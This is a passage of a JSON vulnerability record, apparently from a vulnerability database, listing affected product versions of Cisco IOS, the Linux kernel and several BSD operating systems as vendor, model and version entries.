        "version": "12.1\\(7a\\)e6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(18\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)st"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(4\\)mr"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)s13"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(15\\)s7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc13"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)dc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)s1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)ja"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0\\(12\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.21"
      },
      {
        "model": "dragonflybsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dragonflybsd",
        "version": "1.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)e"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.44"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ea2a"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(10\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(15b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2.2\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xm"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(22\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ea1a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12g\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1m"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ye"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.41"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)yv"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.38"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2da"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(22\\)s2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(16\\)p"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)b1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)seb4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19\\)e6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.22"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(18\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)t1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(7\\)da3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2jx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xm7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(15\\)g"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)s"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(23\\)sv1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(7\\)db1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.50"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17\\)zd3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(11a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19\\)ec"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(16\\)b1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yh"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(8\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)xe3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xj"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.37"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xd"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sbc"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)st6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ew"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(18\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)bc1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "1.1.5.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "5.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20\\)st2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(12e\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)s15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(8\\)p"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(18\\)s7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(15\\)s6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)yy"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xg4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(5\\)ca1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(7\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12.05\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(13\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)jk1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1ct"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)t8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)xn1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(19\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sa"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)xc2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xa"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.17"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xn"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(9\\)s8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)seb2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.24"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0.12\\(a\\)bt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(14\\)e10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(26e\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.36"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)t15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1.3\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)e3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1.4\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)xz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3jk"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ec"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)se"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)e7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)e1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(7\\)aa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8b\\)e8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)xa5"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zj"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.31"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1\\)e5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14.5\\)t"
      },
      {
        "model": "bsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsd",
        "version": "4.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17d\\)sx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(6d\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)ew"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xb4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(28\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)yx1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)cz3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(14.5\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1yd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)t11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(12a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(24\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)t6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xb11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.35.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8b\\)e14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(24\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xe2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sxa"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8\\)ea"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yh"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(5\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc3b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.33.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)e5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)jk2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ex"
      },
      {
        "model": "dragonflybsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dragonflybsd",
        "version": "1.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2xa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(1\\)st"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3jea"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)t3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(22\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(24\\)s1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.22"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(25\\)w5\\(27c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)xw1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)t4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1aa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1\\)dc2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.13"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ya"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yg1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(9\\)ia"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)mb13c"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0\\(20.3\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yo"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)t9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xw"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5.4\\)wc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xm"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(27\\)sv1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(9a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xu"
      },
      {
        "model": "ios",
        "scope": "eq",
